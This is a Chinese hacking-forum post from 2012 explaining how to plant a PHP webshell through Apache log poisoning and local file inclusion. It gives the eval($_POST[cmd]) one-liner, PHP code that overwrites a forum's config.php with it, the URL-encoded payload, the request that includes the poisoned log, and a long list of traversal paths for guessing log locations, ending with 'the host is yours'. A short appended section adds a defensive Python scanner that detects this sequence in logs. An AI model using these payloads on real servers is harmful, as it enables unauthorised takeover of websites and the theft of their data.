中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Writing a webshell by including the Apache log in PHP

Author: admin    Time: 2012-9-15 14:27
The method above is not very practical: in my tests the log was routinely tens of megabytes, which makes that approach pointless. Taking the idea a step further, we write a practical webshell and use that instead, which is also far better than the painfully slow method above.

For example, take the same one-line trojan again:
<?eval($_POST[cmd]);?>

By now you have probably realized this is a pretty good approach. Next, the question becomes how to write it. Use this:
fopen opens the file /home/virtual/www.xxx.com/forum/config.php, and then the one-line trojan server-side statement <?eval($_POST[cmd]);?> is written into it. Put together as a PHP statement, that is:

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?>   // writes the one-line trojan statement into config.php

We submit this statement so that Apache records it in the error log, then include the log, and the shell is written successfully. Remember that it must be converted to URL-encoded form for this to work.
Converted, it becomes:
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
We submit:
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
This way the error log records this line of webshell-writing code.
Next we include the log by submitting:
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

The webshell has now been written successfully: config.php now contains the one-line trojan statement.
OK.
http://www.xxx.com/forum/config.php has now become our webshell.
Connect to it directly with lanker's client and the host is yours.

PS: Everything above presupposes that the folder is writable; it must be -rwxrwxrwx (777) to proceed. Here you can check this directly using the directory listing shown above. Everything described above is exploitation in the case where the log path is known.

For other log paths, you can guess, or refer to the list here.
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
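
A defender's view of the sequence described in the post, as an added example that is not part of the original post: this Python script flags log lines in which a PHP open tag appears (raw or percent-encoded) and requests whose parameter value names a web-server log file. The sample log lines are constructed and the finding labels are this example's own; z.php and zizzy are the names used in the post.

```python
import re
from urllib.parse import parse_qsl, unquote

PHP_TAG_RE = re.compile(r"<\?(?!xml)", re.I)                   # PHP open tag, not <?xml
LOG_PATH_RE = re.compile(r"(?:access?|error)[._]log\b", re.I)  # access_log, error.log, acces_log
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')         # request line of an access-log entry

def fully_decode(text, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised too."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def inspect_line(line):
    """Return the findings for one access-log or error-log line."""
    findings = []
    # Code written into a log: the tag may be raw or still percent-encoded.
    if PHP_TAG_RE.search(fully_decode(line)):
        findings.append("php-tag-in-log")
    # A parameter that points an include at a log file.
    match = REQUEST_RE.search(line)
    if match:
        query = match.group(1).partition("?")[2]
        for name, value in parse_qsl(query, keep_blank_values=True):
            if LOG_PATH_RE.search(fully_decode(value)):
                findings.append("log-path-in-param:" + name)
    return findings

def scan(lines):
    """Map 1-based line numbers to findings, for flagged lines only."""
    return {n: f for n, line in enumerate(lines, 1) if (f := inspect_line(line))}

# Constructed sample lines (documentation IP range, harmless marker in place of a payload).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Sep/2012:14:20:01 +0800] "GET /forum/index.php HTTP/1.1" 200 5120',
    '192.0.2.66 - - [15/Sep/2012:14:21:37 +0800] "GET /%3C%3Fecho%28%27marker%27%29%3B%3F%3E HTTP/1.1" 404 289',
    "[Sat Sep 15 14:21:37 2012] [error] [client 192.0.2.66] File does not exist: /var/www/html/<?echo('marker');?>",
    '192.0.2.66 - - [15/Sep/2012:14:22:05 +0800] "GET /z.php?zizzy=../../../../var/log/httpd/error_log HTTP/1.1" 200 48211',
]

if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE_LOG).items():
        print(lineno, findings)
```

A php-tag-in-log finding followed by a log-path-in-param finding from the same client is the sequence the post describes.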



